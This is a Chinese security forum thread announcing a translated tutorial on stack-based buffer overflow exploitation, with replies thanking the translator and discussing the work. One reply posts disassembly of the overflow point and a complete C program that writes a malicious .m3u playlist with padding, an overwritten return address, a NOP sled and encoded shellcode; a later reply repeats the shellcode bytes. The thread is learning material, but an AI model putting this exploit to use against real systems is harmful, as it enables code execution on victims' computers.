首页
社区
课程
招聘
[翻译]Exploit 编写系列教程第一篇:基于栈的溢出
2009-11-16 19:59 57232

[翻译]Exploit 编写系列教程第一篇:基于栈的溢出

2009-11-16 19:59
57232
第一篇翻译完成
PS:对初学者来讲这是个很不错的漏洞利用的系列教程,相当详细
详细到让我在翻译过程中倍感纠结

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
点赞9
打赏
分享
最新回复 (59)
雪    币: 429
活跃值: (1875)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 41 2009-11-16 22:43
3
0
终于出来了,第二篇目前我正在翻译中,希望有更多的兄弟加入这项翻译工作中来!
雪    币: 429
活跃值: (1875)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 41 2009-11-17 20:01
4
0
yi……怎么没加精呢,上万字哟
雪    币: 61
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
smarttop 2009-11-17 20:21
5
0
一定要精呀
雪    币: 29414
活跃值: (18625)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
kanxue 8 2009-11-17 20:51
6
0
辛苦辛苦~~
雪    币: 429
活跃值: (1875)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 41 2009-11-17 20:54
7
0
第二篇目前翻译了七千多字,还在翻译中……
雪    币: 272
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
crdchen 2009-11-17 21:17
8
0
thanks
雪    币: 370
活跃值: (52)
能力值: ( LV13,RANK:350 )
在线值:
发帖
回帖
粉丝
moonife 8 2009-11-18 16:11
9
0
我跟了下程序的溢出情况,下面的是关键信息,有兴趣的朋友可以详细分析下:
00E58D93    F3:A5           rep     movs dword ptr es:[edi], dword p>   ;这里导致溢出

0041E9E6  |.  81C4 18890000 add     esp, 8918
0041E9EC  \.  C2 0400       retn    4        ;这里覆盖EIP

文中的创建m3u用的perl脚本 我不会 我用C写做测试 贴上来做参考 呵呵:

#include <windows.h>

#pragma comment(linker,"/subsystem:windows")

char Buffer[26094]={0};
DWORD eip=0x73d92ecf; //覆盖返回地址
DWORD param1=0x90909090; //覆盖retn 4 被栈平衡的参数
char nops[25]={0};
char shellcode[]=
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca";

int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
HANDLE hFile;
DWORD temp;

hFile=CreateFile("crash.m3u",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
memset(Buffer,'A',26094);
memset(nops,0x90,25);
WriteFile(hFile,Buffer,26094-31-8,&temp,NULL);
WriteFile(hFile,&eip,4,&temp,NULL);
WriteFile(hFile,¶m1,4,&temp,NULL);
WriteFile(hFile,nops,25,&temp,NULL);
WriteFile(hFile,shellcode,sizeof(shellcode),&temp,NULL);
CloseHandle(hFile);
MessageBox(NULL,"Done","Info",0);
return 0;
}
雪    币: 429
活跃值: (1875)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 41 2009-11-18 16:40
10
0
膜拜moonife,我还想等第二篇翻译完了,也分析一下,结果被你抢先了!建议把软件也传上来吧,呵呵…
雪    币: 131
活跃值: (98)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
gamehacker 1 2009-11-18 16:56
11
0
支持楼主

期待更精彩的文章
雪    币: 388
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
huzhao 2009-11-19 21:25
12
0
非常的期待啊,呵呵
雪    币: 2305
活跃值: (968)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
非虫 7 2009-11-20 12:37
13
0
今天才看到,经典,学习了。
雪    币: 1969
活跃值: (46)
能力值: (RANK:550 )
在线值:
发帖
回帖
粉丝
hawking 12 2009-11-20 14:43
14
0
学习了 顺便传一下相应版本的文件
上传的附件:
雪    币: 429
活跃值: (1875)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 41 2009-11-20 18:13
15
0
感谢hawking版主大人分享,哈哈……
雪    币: 224
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
笨l笨 2009-11-20 21:28
16
0
不错不错。支持!!!
雪    币: 34
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
jordanpz 2009-11-20 22:32
17
0
你是只感谢没有下载。。。。。。。
雪    币: 558
活跃值: (46)
能力值: ( LV2,RANK:16 )
在线值:
发帖
回帖
粉丝
kinglord 2009-11-21 00:15
18
0
支持楼主。。。
等待下一步成果
雪    币: 390
活跃值: (15)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
吹风生 3 2009-11-21 02:45
19
0
moonife,你太强悍了,原来你一直忙着翻译这个哈,牛,我也想翻哈。
雪    币: 270
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
小天狼星 2009-11-21 22:41
20
0
“这里我们用WinDbg,按照WinDbg(完全安装)和用“windbg -I”注册它为一个“post-mortem”
调试器”
post-mortem debugger 就是即时调试器的意思
雪    币: 370
活跃值: (52)
能力值: ( LV13,RANK:350 )
在线值:
发帖
回帖
粉丝
moonife 8 2009-11-21 22:57
21
0
恩 感谢小天狼星指出
“安装”打成“按照”了
雪    币: 211
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
aoyuhuaoju 2009-12-5 15:44
22
0
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 这是加密的代码吗
雪    币: 370
活跃值: (52)
能力值: ( LV13,RANK:350 )
在线值:
发帖
回帖
粉丝
moonife 8 2009-12-5 18:11
23
0
这个是可以执行,一般用于测试的shellcode
被加密过了,开头部分开始自解码的
你可以拉人OD跟下
雪    币: 1137
活跃值: (10)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
dreamzgj 2 2009-12-7 23:15
24
0
刚在moonife兄的blog里才看到!

我收藏了哈!
雪    币: 217
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
俊虎 2009-12-8 17:01
25
0
刚看到,收藏了,辛苦
游客
登录 | 注册 方可回帖
返回